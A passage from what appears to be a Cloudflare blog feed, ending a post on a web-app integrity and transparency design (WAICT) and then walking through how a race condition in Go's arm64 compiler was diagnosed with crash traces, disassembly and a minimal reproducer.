of additional nice properties.</p>
    <div>
      <h2>(Not) Achieving Consistency</h2>
      <a href="#not-achieving-consistency">
        
      </a>
    </div>
    <p>Transparency would be useless if, every time a site updates, it serves 100,000 new versions of itself. Any auditor would have to go through every single version of the code in order to ensure no user was targeted with malware. This is bad even if the velocity of versions is lower. If a site publishes just one new version per week, but every version from the past ten years is still servable, then users can still be served extremely old, potentially vulnerable versions of the site, without anyone knowing. Thus, in order to make transparency valuable, we need <b>consistency</b>, the property that every browser sees the same version of the site at a given time.</p><p>We will not achieve the strongest version of consistency, but it turns out that weaker notions are sufficient for us. If, unlike the above scenario, a site had 8 valid versions of itself at a given time, then that would be pretty manageable for an auditor. So even though it’s true that users don’t all see the same version of the site, they will all still benefit from transparency, as desired.</p><p>We describe two types of inconsistency and how we mitigate them.</p>
    <div>
      <h3>Tree Inconsistency</h3>
      <a href="#tree-inconsistency">
        
      </a>
    </div>
    <p>Tree inconsistency occurs when transparency services’ prefix trees disagree on the chain hash of a site, thus disagreeing on the history of the site. One way to fully eliminate this is to establish a consensus mechanism for prefix trees. A simple one is majority voting: if there are five transparency services, a site must present three tree inclusion proofs to a user, showing the chain hash is present in three trees. This, of course, triples the tree inclusion proof size, and lowers the fault tolerance of the entire system (if three log operators go down, then no transparent site can publish any updates).</p><p>Instead of consensus, we opt to simply limit the amount of inconsistency by limiting the number of transparency services. In 2025, Chrome <a href="https://www.gstatic.com/ct/log_list/v3/log_list.json"><u>trusts</u></a> eight Certificate Transparency logs. A similar number of transparency services would be fine for our system. Plus, it is still possible to detect and prove the existence of inconsistencies between trees, since roots are signed by witnesses. So if it becomes the norm to use the same version on all trees, then social pressure can be applied when sites violate this.</p>
    <div>
      <h3>Temporal Inconsistency</h3>
      <a href="#temporal-inconsistency">
        
      </a>
    </div>
    <p>Temporal inconsistency occurs when a user gets a newer or older version of the site (both still unexpired), depending on some external factors such as geographic location or cookie values. In the extreme, as stated above, if a signed prefix root is valid for ten years, then a site can serve a user any version of the site from the last ten years.</p><p>As with tree inconsistency, this can be resolved using consensus mechanisms. If, for example, the latest manifest were published on a blockchain, then a user could fetch the latest blockchain head and ensure they got the latest version of the site. However, this incurs an extra network round trip for the client, and requires sites to wait for their hash to get published on-chain before they can update. More importantly, building this kind of consensus mechanism into our specification would drastically increase its complexity. We’re aiming for v1.0 here.</p><p>We mitigate temporal inconsistency by requiring reasonably short validity periods for witness signatures. Making prefix root signatures valid for, e.g., one week would drastically limit the number of simultaneously servable versions. The cost is that site operators must now query the transparency service at least once a week for the new signed root and inclusion proof, even if nothing in the site changed. The sites cannot skip this, and the transparency service must be able to handle this load. This parameter must be tuned carefully.</p>
    <div>
      <h2>Beyond Integrity, Consistency, and Transparency</h2>
      <a href="#beyond-integrity-consistency-and-transparency">
        
      </a>
    </div>
    <p>Providing integrity, consistency, and transparency is already a huge endeavor, but there are some additional app store-like security features that can be integrated into this system without too much work.</p>
    <div>
      <h3>Code Signing</h3>
      <a href="#code-signing">
        
      </a>
    </div>
    <p>One problem that WAICT doesn’t solve is that of <i>provenance</i>: where did the code the user is running come from, precisely? In settings where audits of code happen frequently, this is not so important, because some third party will be reading the code regardless. But for smaller self-hosted deployments of open-source software, this may not be viable. For example, if Alice hosts her own version of <a href="https://cryptpad.org/"><u>Cryptpad</u></a> for her friend Bob, how can Bob be sure the code matches the real code in Cryptpad’s Github repo?</p><p><b>WEBCAT.</b> The folks at the Freedom of Press Foundation (FPF) have built a solution to this, called <a href="https://securedrop.org/news/introducing-webcat-web-based-code-assurance-and-transparency/"><u>WEBCAT</u></a>. This protocol allows site owners to announce the identities of the developers that have signed the site’s integrity manifest, i.e., have signed all the code and other assets that the site is serving to the user. Users with the WEBCAT plugin can then see the developer’s <a href="https://www.sigstore.dev/"><u>Sigstore</u></a> signatures, and trust the code based on that.</p><p>We’ve made WAICT extensible enough to fit WEBCAT inside and benefit from the transparency components. Concretely, we permit manifests to hold additional metadata, which we call <b>extensions</b>. In this case, the extension holds a list of developers’ Sigstore identities. To be useful, browsers must expose an API for browser plugins to access these extension values. With this API, independent parties can build plugins for whatever feature they wish to layer on top of WAICT.</p>
    <div>
      <h2>Cooldown</h2>
      <a href="#cooldown">
        
      </a>
    </div>
    <p>So far we have not built anything that can prevent attacks in the moment. An attacker who breaks into a website can still delete any code-signing extensions, or just unenroll the site from transparency entirely, and continue with their attack as normal. The unenrollment will be logged, but the malicious code will not be, and by the time anyone sees the unenrollment, it may be too late.</p><p>To prevent spontaneous unenrollment, we can enforce <b>unenrollment cooldown</b> client-side. Suppose the cooldown period is 24 hours. Then the rule is: if a site appears on the preload list, then the client will require that either 1) the site have transparency enabled, or 2) the site have a tombstone entry that is at least 24 hours old. Thus, an attacker will be forced to either serve a transparency-enabled version of the site, or serve a broken site for 24 hours.</p><p>Similarly, to prevent spontaneous extension modifications, we can enforce <b>extension cooldown</b> on the client. We will take code signing as an example, saying that any change in developer identities requires a 24 hour waiting period to be accepted. First, we require that extension <code>dev-ids</code> has a preload list of its own, letting the client know which sites have opted into code signing (if a preload list doesn’t exist then any site can delete the extension at any time). The client rule is as follows: if the site appears in the preload list, then both 1) <code>dev-ids</code> must exist as an extension in the manifest, and 2) <code>dev-ids-inclusion</code> must contain an inclusion proof showing that the current value of dev-ids was in a prefix tree that is at least 24 hours old. With this rule, a client will reject values of <code>dev-ids</code> that are newer than a day. If a site wants to delete <code>dev-ids</code>, they must 1) request that it be removed from the preload list, and 2) in the meantime, replace the dev-ids value with the empty string and update <code>dev-ids-inclusion</code> to reflect the new value.</p>
    <div>
      <h2>Deployment Considerations</h2>
      <a href="#deployment-considerations">
        
      </a>
    </div>
    <p>There are a lot of distinct roles in this ecosystem. Let’s sketch out the trust and resource requirements for each role.</p><p><b>Transparency service.</b> These parties store metadata for every transparency-enabled site on the web. If there are 100 million domains, and each entry is 256B each (a few hashes, plus a URL), this comes out to 26GB for a single tree, not including the intermediate hashes. To prevent size blowup, there would probably have to be a pruning rule that unenrolls sites after a long inactivity period. Transparency services should have largely uncorrelated downtime, since, if all services go down, no transparency-enabled site can make any updates. Thus, transparency services must have a moderate amount of storage, be relatively highly available, and have downtime periods uncorrelated with each other.</p><p>Transparency services require some trust, but their behavior is narrowly constrained by witnesses. Theoretically, a service can replace any leaf’s chain hash with its own, and the witness will validate it (as long as the consistency proof is valid). But such changes are detectable by anyone that monitors that leaf.</p><p><b>Witness.</b> These parties verify prefix tree updates and sign the resulting roots. Their storage costs are similar to that of a transparency service, since they must keep a full copy of a prefix tree for every transparency service they witness. Also like the transparency services, they must have high uptime. Witnesses must also be trusted to keep their signing key secret for a long period of time, at least long enough to permit browser trust stores to be updated when a new key is created.</p><p><b>Asset host.</b> These parties carry little trust. They cannot serve bad data, since any query response is hashed and compared to a known hash. The only malicious behavior an asset host can do is refuse to respond to queries. Asset hosts can also do this by accident due to downtime.</p><p><b>Client.</b> This is the most trust-sensitive part. The client is the software that performs all the transparency and integrity checks. This is, of course, the web browser itself. We must trust this.</p><p>We at Cloudflare would like to contribute what we can to this ecosystem. It should be possible to run both a transparency service and a witness. Of course, our witness should not monitor our own transparency service. Rather, we can witness other organizations’ transparency services, and our transparency service can be witnessed by other organizations.</p>
    <div>
      <h3>Supporting Alternate Ecosystems</h3>
      <a href="#supporting-alternate-ecosystems">
        
      </a>
    </div>
    <p>WAICT should be compatible with non-standard ecosystems, ones where the large players do not really exist, or at least not in the way they usually do. We are working with the FPF on defining transparency for alternate ecosystems with different network and trust environments. The primary example we have is that of the Tor ecosystem.</p><p>A paranoid Tor user may not trust existing transparency services or witnesses, and there might not be any other trusted party with the resources to self-host these functionalities. For this use case, it may be reasonable to put the <a href="https://github.com/freedomofpress/webcat-infra-chain"><u>prefix tree on a blockchain somewhere</u></a>. This makes the usual domain validation impossible (there’s no validator server to speak of), but this is fine for onion services. Since an onion address is just a public key, a signature is sufficient to prove ownership of the domain.</p><p>One consequence of a consensus-backed prefix tree is that witnesses are now unnecessary, and there is only need for the single, canonical, transparency service. This mostly solves the problems of tree inconsistency at the expense of latency of updates.</p>
    <div>
      <h2>Next Steps</h2>
      <a href="#next-steps">
        
      </a>
    </div>
    <p>We are still very early in the standardization process. One of the more immediate next steps is to get subresource integrity working for more data types, particularly WASM and images. After that, we can begin standardizing the integrity manifest format. And then after that we can start standardizing all the other features. We intend to work on this specification hand-in-hand with browsers and the IETF, and we hope to have some exciting betas soon.</p><p>In the meantime, you can follow along with our <a href="https://github.com/rozbb/draft-waict-transparency"><u>transparency specification draft</u></a>, check out the open problems, and share your ideas. Pull requests and issues are always welcome!</p>
    <div>
      <h2>Acknowledgements</h2>
      <a href="#acknowledgements">
        
      </a>
    </div>
    <p>Many thanks to Dennis Jackson from Mozilla for the lengthy back-and-forth meetings on design, to Giulio B and Cory Myers from FPF for their immensely helpful influence and feedback, and to Richard Hansen for great feedback.</p> ]]></content:encoded>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[Malicious JavaScript]]></category>
            <category><![CDATA[JavaScript]]></category>
            <category><![CDATA[Deep Dive]]></category>
            <category><![CDATA[Cryptography]]></category>
            <category><![CDATA[Research]]></category>
            <guid isPermaLink="false">6GRxDReQHjD7T0xpfjf7Iq</guid>
            <dc:creator>Michael Rosenberg</dc:creator>
        </item>
        <item>
            <title><![CDATA[How we found a bug in Go's arm64 compiler]]></title>
            <link>https://blog.cloudflare.com/how-we-found-a-bug-in-gos-arm64-compiler/</link>
            <pubDate>Wed, 08 Oct 2025 14:00:00 GMT</pubDate>
            <description><![CDATA[ 84 million requests a second means even rare bugs appear often. We'll reveal how we discovered a race condition in the Go arm64 compiler and got it fixed. ]]></description>
            <content:encoded><![CDATA[ <p>Every second, 84 million HTTP requests are hitting Cloudflare across our fleet of data centers in 330 cities. It means that even the rarest of bugs can show up frequently. In fact, it was our scale that recently led us to discover a bug in Go's arm64 compiler which causes a race condition in the generated code.</p><p>This post breaks down how we first encountered the bug, investigated it, and ultimately drove to the root cause.</p>
    <div>
      <h2>Investigating a strange panic</h2>
      <a href="#investigating-a-strange-panic">
        
      </a>
    </div>
    <p>We run a service in our network which configures the kernel to handle traffic for some products like <a href="https://www.cloudflare.com/network-services/products/magic-transit/"><u>Magic Transit</u></a> and <a href="https://www.cloudflare.com/network-services/products/magic-wan/"><u>Magic WAN</u></a>. Our monitoring watches this closely, and it started to observe very sporadic panics on arm64 machines.</p><p>We first saw one with a fatal error stating that <a href="https://github.com/golang/go/blob/c0ee2fd4e309ef0b8f4ab6f4860e2626c8e00802/src/runtime/traceback.go#L566"><u>traceback did not unwind completely</u></a>. That error suggests that invariants were violated when traversing the stack, likely because of stack corruption. After a brief investigation we decided that it was probably rare stack memory corruption. This was a largely idle control plane service where unplanned restarts have negligible impact, and so we felt that following up was not a priority unless it kept happening.</p><p>And then it kept happening. </p>
    <div>
      <h4>Coredumps per hour</h4>
      <a href="#coredumps-per-hour">
        
      </a>
    </div>
    
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7ohMD2ph3I9l7lbZQWZ4xl/243e679d8293565fc6a55a670c9f3583/BLOG-2906_2.png" />
          </figure><p>When we first saw this bug we saw that the fatal errors correlated with recovered panics. These were caused by some old code which used panic/recover as error handling. </p><p>At this point, our theory was: </p><ol><li><p>All of the fatal panics happen within stack unwinding.</p></li><li><p>We correlated an increased volume of recovered panics with these fatal panics.</p></li><li><p>Recovering a panic unwinds goroutine stacks to call deferred functions.</p></li><li><p>A related <a href="https://github.com/golang/go/issues/73259"><u>Go issue (#73259)</u></a> reported an arm64 stack unwinding crash.</p></li><li><p>Let’s stop using panic/recover for error handling and wait out the upstream fix?</p></li></ol><p>So we did that and watched as fatal panics stopped occurring as the release rolled out. Fatal panics gone, our theoretical mitigation seemed to work, and this was no longer our problem. We subscribed to the upstream issue so we could update when it was resolved and put it out of our minds.</p><p>But, this turned out to be a much stranger bug than expected. Putting it out of our minds was premature as the same class of fatal panics came back at a much higher rate. A month later, we were seeing up to 30 daily fatal panics with no real discernible cause; while that might account for only one machine a day in less than 10% of our data centers, we found it concerning that we didn’t understand the cause. The first thing we checked was the number of recovered panics, to match our previous pattern, but there were none. More interestingly, we could not correlate this increased rate of fatal panics with anything. A release? Infrastructure changes? The position of Mars? </p><p>At this point we felt like we needed to dive deeper to better understand the root cause. Pattern matching and hoping was clearly insufficient. </p><p>We saw two classes of this bug -- a crash while accessing invalid memory and an explicitly checked fatal error. </p>
    <div>
      <h4>Fatal Error</h4>
      <a href="#fatal-error">
        
      </a>
    </div>
    
            <pre><code>goroutine 153 gp=0x4000105340 m=324 mp=0x400639ea08 [GC worker (active)]:
/usr/local/go/src/runtime/asm_arm64.s:244 +0x6c fp=0x7ff97fffe870 sp=0x7ff97fffe860 pc=0x55558d4098fc
runtime.systemstack(0x0)
       /usr/local/go/src/runtime/mgc.go:1508 +0x68 fp=0x7ff97fffe860 sp=0x7ff97fffe810 pc=0x55558d3a9408
runtime.gcBgMarkWorker.func2()
       /usr/local/go/src/runtime/mgcmark.go:1102
runtime.gcDrainMarkWorkerIdle(...)
       /usr/local/go/src/runtime/mgcmark.go:1188 +0x434 fp=0x7ff97fffe810 sp=0x7ff97fffe7a0 pc=0x55558d3ad514
runtime.gcDrain(0x400005bc50, 0x7)
       /usr/local/go/src/runtime/mgcmark.go:212 +0x1c8 fp=0x7ff97fffe7a0 sp=0x7ff97fffe6f0 pc=0x55558d3ab248
runtime.markroot(0x400005bc50, 0x17e6, 0x1)
       /usr/local/go/src/runtime/mgcmark.go:238 +0xa8 fp=0x7ff97fffe6f0 sp=0x7ff97fffe6a0 pc=0x55558d3ab578
runtime.markroot.func1()
       /usr/local/go/src/runtime/mgcmark.go:887 +0x290 fp=0x7ff97fffe6a0 sp=0x7ff97fffe560 pc=0x55558d3acaa0
runtime.scanstack(0x4014494380, 0x400005bc50)
       /usr/local/go/src/runtime/traceback.go:447 +0x2ac fp=0x7ff97fffe560 sp=0x7ff97fffe4d0 pc=0x55558d3eeb7c
runtime.(*unwinder).next(0x7ff97fffe5b0?)
       /usr/local/go/src/runtime/traceback.go:566 +0x110 fp=0x7ff97fffe4d0 sp=0x7ff97fffe490 pc=0x55558d3eed40
runtime.(*unwinder).finishInternal(0x7ff97fffe4f8?)
       /usr/local/go/src/runtime/panic.go:1073 +0x38 fp=0x7ff97fffe490 sp=0x7ff97fffe460 pc=0x55558d403388
runtime.throw({0x55558de6aa27?, 0x7ff97fffe638?})
runtime stack:
fatal error: traceback did not unwind completely
       stack=[0x4015d6a000-0x4015d8a000
runtime: g8221077: frame.sp=0x4015d784c0 top=0x4015d89fd0</code></pre>
            <p></p>
    <div>
      <h4>Segmentation fault</h4>
      <a href="#segmentation-fault">
        
      </a>
    </div>
    
            <pre><code>goroutine 187 gp=0x40003aea80 m=13 mp=0x40003ca008 [GC worker (active)]:
       /usr/local/go/src/runtime/asm_arm64.s:244 +0x6c fp=0x7fff2afde870 sp=0x7fff2afde860 pc=0x55557e2d98fc
runtime.systemstack(0x0)
       /usr/local/go/src/runtime/mgc.go:1489 +0x94 fp=0x7fff2afde860 sp=0x7fff2afde810 pc=0x55557e279434
runtime.gcBgMarkWorker.func2()
       /usr/local/go/src/runtime/mgcmark.go:1112
runtime.gcDrainMarkWorkerDedicated(...)
       /usr/local/go/src/runtime/mgcmark.go:1188 +0x434 fp=0x7fff2afde810 sp=0x7fff2afde7a0 pc=0x55557e27d514
runtime.gcDrain(0x4000059750, 0x3)
       /usr/local/go/src/runtime/mgcmark.go:212 +0x1c8 fp=0x7fff2afde7a0 sp=0x7fff2afde6f0 pc=0x55557e27b248
runtime.markroot(0x4000059750, 0xb8, 0x1)
       /usr/local/go/src/runtime/mgcmark.go:238 +0xa8 fp=0x7fff2afde6f0 sp=0x7fff2afde6a0 pc=0x55557e27b578
runtime.markroot.func1()
       /usr/local/go/src/runtime/mgcmark.go:887 +0x290 fp=0x7fff2afde6a0 sp=0x7fff2afde560 pc=0x55557e27caa0
runtime.scanstack(0x40042cc000, 0x4000059750)
       /usr/local/go/src/runtime/traceback.go:458 +0x188 fp=0x7fff2afde560 sp=0x7fff2afde4d0 pc=0x55557e2bea58
runtime.(*unwinder).next(0x7fff2afde5b0)
goroutine 0 gp=0x40003af880 m=13 mp=0x40003ca008 [idle]:
PC=0x55557e2bea58 m=13 sigcode=1 addr=0x118
SIGSEGV: segmentation violation</code></pre>
            <p></p><p></p><p>Now we could observe some clear patterns. Both errors occur when unwinding the stack in <code>(*unwinder).next</code>. In one case we saw an intentional<a href="https://github.com/golang/go/blob/b3251514531123d7fd007682389bce7428d159a0/src/runtime/traceback.go#L566"> <u>fatal error</u></a> as the runtime identified that unwinding could not complete and the stack was in a bad state. In the other case there was a direct memory access error that happened while trying to unwind the stack. The segfault was discussed in the <a href="https://github.com/golang/go/issues/73259#issuecomment-2786818812"><u>GitHub issue</u></a> and a Go engineer identified it as dereference of a go scheduler struct, <a href="https://github.com/golang/go/blob/924fe98902cdebf20825ab5d1e4edfc0fed2966f/src/runtime/runtime2.go#L536"><u>m</u></a>, when<a href="https://github.com/golang/go/blob/b3251514531123d7fd007682389bce7428d159a0/src/runtime/traceback.go#L458"> <u>unwinding</u></a>.   </p>
    <div>
      <h3>A review of Go scheduler structs</h3>
      <a href="#a-review-of-go-scheduler-structs">
        
      </a>
    </div>
    <p>Go uses a lightweight userspace scheduler to manage concurrency. Many goroutines are scheduled on a smaller number of kernel threads – this is often referred to as M:N scheduling. Any individual goroutine can be scheduled on any kernel thread. The scheduler has three core types – <a href="https://github.com/golang/go/blob/924fe98902cdebf20825ab5d1e4edfc0fed2966f/src/runtime/runtime2.go#L394"><code><u>g</u></code></a>  (the goroutine), <a href="https://github.com/golang/go/blob/924fe98902cdebf20825ab5d1e4edfc0fed2966f/src/runtime/runtime2.go#L536"><code><u>m</u></code></a> (the kernel thread, or “machine”), and <a href="https://github.com/golang/go/blob/924fe98902cdebf20825ab5d1e4edfc0fed2966f/src/runtime/runtime2.go#L644"><code><u>p</u></code></a> (the physical execution context, or  “processor”). For a goroutine to be scheduled a free <code>m</code> must acquire a free <code>p</code>, which will execute a g. Each <code>g</code> contains a field for its m if it is currently running, otherwise it will be <b>nil</b>. This is all the context needed for this post but the <a href="https://github.com/golang/go/blob/master/src/runtime/HACKING.md#gs-ms-ps"><u>go runtime docs</u></a> explore this more comprehensively. </p><p>At this point we can start to make inferences on what’s happening: the program crashes because we try to unwind a goroutine stack which is invalid. In the first backtrace, if a <a href="https://github.com/golang/go/blob/b3251514531123d7fd007682389bce7428d159a0/src/runtime/traceback.go#L446"><u>return address is null, we call </u><code><u>finishInternal</u></code><u> and abort because the stack was not fully unwound</u></a>. The segmentation fault case in the second backtrace is a bit more interesting: if instead the return address is non-zero but not a function then the unwinder code assumes that the goroutine is currently running. It'll then dereference m and fault by accessing <code>m.incgo</code> (the offset of <code>incgo</code> into <code>struct m</code> is 0x118, the faulting memory access). </p><p>What, then, is causing this corruption? The traces were difficult to get anything useful from – our service has hundreds if not thousands of active goroutines. It was fairly clear from the beginning that the panic was remote from the actual bug. The crashes were all observed while unwinding the stack and if this were an issue any time the stack was unwound on arm64 we would be seeing it in many more services. We felt pretty confident that the stack unwinding was happening correctly but on an invalid stack. </p><p>Our investigation stalled for a while at this point – making guesses, testing guesses, trying to infer if the panic rate went up or down, or if nothing changed. There was <a href="https://github.com/golang/go/issues/73259"><u>a known issue</u></a> on Go’s GitHub issue tracker which matched our symptoms almost exactly, but what they discussed was mostly what we already knew. At some point when looking through the linked stack traces we realized that their crash referenced an old version of a library that we were also using – Go Netlink.</p>
            <pre><code>goroutine 1267 gp=0x4002a8ea80 m=nil [runnable (scan)]:
runtime.asyncPreempt2()
        /usr/local/go/src/runtime/preempt.go:308 +0x3c fp=0x4004cec4c0 sp=0x4004cec4a0 pc=0x46353c
runtime.asyncPreempt()
        /usr/local/go/src/runtime/preempt_arm64.s:47 +0x9c fp=0x4004cec6b0 sp=0x4004cec4c0 pc=0x4a6a8c
github.com/vishvananda/netlink/nl.(*NetlinkSocket).Receive(0x14360300000000?)
        /go/pkg/mod/github.com/!data!dog/netlink@v1.0.1-0.20240223195320-c7a4f832a3d1/nl/nl_linux.go:803 +0x130 fp=0x4004cfc710 sp=0x4004cec6c0 pc=0xf95de0
</code></pre>
            <p></p><p>We spot-checked a few stack traces and confirmed the presence of this Netlink library. Querying our logs showed that not only did we share a library – every single segmentation fault we observed had happened while preempting<a href="https://github.com/vishvananda/netlink/blob/e1e260214862392fb28ff72c9b11adc84df73e2c/nl/nl_linux.go#L880"> <code><u>NetlinkSocket.Receive</u></code></a>.</p>
    <div>
      <h3>What’s (async) preemption?</h3>
      <a href="#whats-async-preemption">
        
      </a>
    </div>
    <p>In the prehistoric era of Go (&lt;=1.13) the runtime was cooperatively scheduled. A goroutine would run until it decided it was ready to yield to the scheduler – usually due to explicit calls to <code>runtime.Gosched()</code> or injected yield points at function calls/IO operations. Since<a href="https://go.dev/doc/go1.14#runtime"> <u>Go 1.14</u></a> the runtime instead does async preemption. The Go runtime has a thread <code>sysmon</code> which tracks the runtime of goroutines and will preempt any that run for longer than 10ms (at time of writing). It does this by sending <code>SIGURG</code> to the OS thread and in the signal handler will modify the program counter and stack to mimic a call to <code>asyncPreempt</code>.</p><p>At this point we had two broad theories:</p><ul><li><p>This is a Go Netlink bug – likely due to <code>unsafe.Pointer</code> usage which invoked undefined behavior but is only actually broken on arm64</p></li><li><p>This is a Go runtime bug and we're only triggering it in <code>NetlinkSocket.Receive</code> for some reason</p></li></ul><p>After finding the same bug publicly reported upstream, we were feeling confident this was caused by a Go runtime bug. However, upon seeing that both issues implicated the same function, we felt more skeptical – notably the Go Netlink library uses unsafe.Pointer so memory corruption was a plausible explanation even if we didn't understand why.</p><p>After an unsuccessful code audit we had hit a wall. The crashes were rare and remote from the root cause. Maybe these crashes were caused by a runtime bug, maybe they were caused by a Go Netlink bug. It seemed clear that there was something wrong with this area of the code, but code auditing wasn’t going anywhere. </p>
    <div>
      <h2>Breakthrough</h2>
      <a href="#breakthrough">
        
      </a>
    </div>
    <p>At this point we had a fairly good understanding of what was crashing but very little understanding of <b>why</b> it was happening. It was clear that the root cause of the stack unwinder crashing was remote from the actual crash, and that it had to do with <code>(*NetlinkSocket).Receive</code>, but why? We were able to capture a <b>coredump</b> of a production crash and view it in a debugger. The backtrace confirmed what we already knew – that there was a segmentation fault when unwinding a stack. The crux of the issue revealed itself when we looked at the goroutine which had been preempted while calling <code>(*NetlinkSocket).Receive</code>.     </p>
            <pre><code>(dlv) bt
0  0x0000555577579dec in runtime.asyncPreempt2
   at /usr/local/go/src/runtime/preempt.go:306
1  0x00005555775bc94c in runtime.asyncPreempt
   at /usr/local/go/src/runtime/preempt_arm64.s:47
2  0x0000555577cb2880 in github.com/vishvananda/netlink/nl.(*NetlinkSocket).Receive
   at
/vendor/github.com/vishvananda/netlink/nl/nl_linux.go:779
3  0x0000555577cb19a8 in github.com/vishvananda/netlink/nl.(*NetlinkRequest).Execute
   at 
/vendor/github.com/vishvananda/netlink/nl/nl_linux.go:532
4  0x0000555577551124 in runtime.heapSetType
   at /usr/local/go/src/runtime/mbitmap.go:714
5  0x0000555577551124 in runtime.heapSetType
   at /usr/local/go/src/runtime/mbitmap.go:714
...
(dlv) disass -a 0x555577cb2878 0x555577cb2888
TEXT github.com/vishvananda/netlink/nl.(*NetlinkSocket).Receive(SB) /vendor/github.com/vishvananda/netlink/nl/nl_linux.go
        nl_linux.go:779 0x555577cb2878  fdfb7fa9        LDP -8(RSP), (R29, R30)
        nl_linux.go:779 0x555577cb287c  ff430191        ADD $80, RSP, RSP
        nl_linux.go:779 0x555577cb2880  ff434091        ADD $(16&lt;&lt;12), RSP, RSP
        nl_linux.go:779 0x555577cb2884  c0035fd6        RET
</code></pre>
            <p></p><p>The goroutine was paused between two opcodes in the function epilogue. Since the process of unwinding a stack relies on the stack frame being in a consistent state, it felt immediately suspicious that we preempted in the middle of adjusting the stack pointer. The goroutine had been paused at 0x555577cb2880, between<code> ADD $80, RSP, RSP and ADD $(16&lt;&lt;12), RSP, RSP</code>. </p><p>We queried the service logs to confirm our theory. This wasn’t isolated – the majority of stack traces showed that this same opcode was preempted. This was no longer a weird production crash we couldn’t reproduce. A crash happened when the Go runtime preempted between these two stack pointer adjustments. We had our smoking gun. </p>
    <div>
      <h2>Building a minimal reproducer</h2>
      <a href="#building-a-minimal-reproducer">
        
      </a>
    </div>
    <p>At this point we felt pretty confident that this was actually just a runtime bug and it should be reproducible in an isolated environment without any dependencies. The theory at this point was:</p><ol><li><p>Stack unwinding is triggered by garbage collection</p></li><li><p>Async preemption between a split stack pointer adjustment causes a crash</p></li><li><p>What if we make a function which splits the adjustment and then call it in a loop?</p></li></ol>
            <pre><code>package main

import (
	"runtime"
)

//go:noinline
func big_stack(val int) int {
	var big_buffer = make([]byte, 1 &lt;&lt; 16)

	sum := 0
	// prevent the compiler from optimizing out the stack
	for i := 0; i &lt; (1&lt;&lt;16); i++ {
		big_buffer[i] = byte(val)
	}
	for i := 0; i &lt; (1&lt;&lt;16); i++ {
		sum ^= int(big_buffer[i])
	}
	return sum
}

func main() {
	go func() {
		for {
			runtime.GC()
		}
	}()
	for {
		_ = big_stack(1000)
	}
}
</code></pre>
            <p></p><p>This function ends up with a stack frame slightly larger than can be represented in 16 bits, and so on arm64 the Go compiler will split the stack pointer adjustment into two opcodes. If the runtime preempts between these opcodes then the stack unwinder will read an invalid stack pointer and crash. </p>
            <pre><code>; epilogue for main.big_stack
ADD $8, RSP, R29
ADD $(16&lt;&lt;12), R29, R29
ADD $16, RSP, RSP
; preemption is problematic between these opcodes
ADD $(16&lt;&lt;12), RSP, RSP
RET
</code></pre>
            <p></p><p>After running this for a few minutes the program panicked as expected!</p>
            <pre><code>SIGSEGV: segmentation violation
PC=0x60598 m=8 sigcode=1 addr=0x118

goroutine 0 gp=0x400019c540 m=8 mp=0x4000198708 [idle]:
runtime.(*unwinder).next(0x400030fd10)
        /home/thea/sdk/go1.23.4/src/runtime/traceback.go:458 +0x188 fp=0x400030fcc0 sp=0x400030fc30 pc=0x60598
runtime.scanstack(0x40000021c0, 0x400002f750)
        /home/thea/sdk/go1.23.4/src/runtime/mgcmark.go:887 +0x290 

[...]

goroutine 1 gp=0x40000021c0 m=nil [runnable (scan)]:
runtime.asyncPreempt2()
        /home/thea/sdk/go1.23.4/src/runtime/preempt.go:308 +0x3c fp=0x40003bfcf0 sp=0x40003bfcd0 pc=0x400cc
runtime.asyncPreempt()
        /home/thea/sdk/go1.23.4/src/runtime/preempt_arm64.s:47 +0x9c fp=0x40003bfee0 sp=0x40003bfcf0 pc=0x75aec
main.big_stack(0x40003cff38?)
        /home/thea/dev/stack_corruption_reproducer/main.go:29 +0x94 fp=0x40003cff00 sp=0x40003bfef0 pc=0x77c04
Segmentation fault (core dumped)

real    1m29.165s
user    4m4.987s
sys     0m43.212s</code></pre>
            <p></p><p>A reproducible crash with standard library only? This felt like conclusive evidence that our problem was a runtime bug.</p><p>This was an extremely particular reproducer! Even now with a good understanding of the bug and its fix, some of the behavior is still puzzling. It's a one-instruction race condition, so it’s unsurprising that small changes could have large impact. For example, this reproducer was originally written and tested on Go 1.23.4, but did not crash when compiled with 1.23.9 (the version in production), even though we could objdump the binary and see the split ADD still present! We don’t have a definite explanation for this behavior – even with the bug present there remain a few unknown variables which affect the likelihood of hitting the race condition. </p>
    <div>
      <h2>A single-instruction race condition window</h2>
      <a href="#a-single-instruction-race-condition-window">
        
      </a>
    </div>
    <p>arm64 is a fixed-length 4-byte instruction set architecture. This has a lot of implications on codegen but most relevant to this bug is the fact that immediate length is limited.<a href="https://developer.arm.com/documentation/ddi0596/2020-12/Base-Instructions/ADD--immediate---Add--immediate--"> <code><u>add</u></code></a> gets a 12-bit immediate,<a href="https://developer.arm.com/documentation/dui0802/a/A64-General-Instructions/MOV--wide-immediate-"> <code><u>mov</u></code></a> gets a 16-bit immediate, etc. How does the architecture handle this when the operands don't fit? It depends – <code>ADD</code> in particular reserves a bit for "shift left by 12" so any 24 bit addition can be decomposed into two opcodes. Other instructions are decomposed similarly, or just require loading an immediate into a register first. </p><p>The very last step of the Go compiler before emitting machine code involves transforming the program into <code>obj.Prog</code> structs. It's a very low level intermediate representation (IR) that mostly serves to be translated into machine code. </p>
            <pre><code>//https://github.com/golang/go/blob/fa2bb342d7b0024440d996c2d6d6778b7a5e0247/src/cmd/internal/obj/arm64/obj7.go#L856

// Pop stack frame.
// ADD $framesize, RSP, RSP
p = obj.Appendp(p, c.newprog)
p.As = AADD
p.From.Type = obj.TYPE_CONST
p.From.Offset = int64(c.autosize)
p.To.Type = obj.TYPE_REG
p.To.Reg = REGSP
p.Spadj = -c.autosize
</code></pre>
            <p></p><p>Notably, this IR is not aware of immediate length limitations. Instead, this happens in<a href="https://github.com/golang/go/blob/2f653a5a9e9112ff64f1392ff6e1d404aaf23e8c/src/cmd/internal/obj/arm64/asm7.go"> <u>asm7.go</u></a> when Go's internal intermediate representation is translated into arm64 machine code. The assembler will classify an immediate in <a href="https://github.com/golang/go/blob/2f653a5a9e9112ff64f1392ff6e1d404aaf23e8c/src/cmd/internal/obj/arm64/asm7.go#L1905"><u>conclass</u></a> based on bit size and then use that when emitting instructions – extra if needed.</p><p>The Go assembler uses a combination of (<code>mov, add</code>) opcodes for some adds that fit in 16-bit immediates, and prefers (<code>add, add + lsl 12</code>) opcodes for 16-bit+ immediates.   </p><p>Compare a stack of (slightly larger than) <code>1&lt;&lt;15</code>:</p>
            <pre><code>; //go:noinline
; func big_stack() byte {
; 	var big_stack = make([]byte, 1&lt;&lt;15)
; 	return big_stack[0]
; }
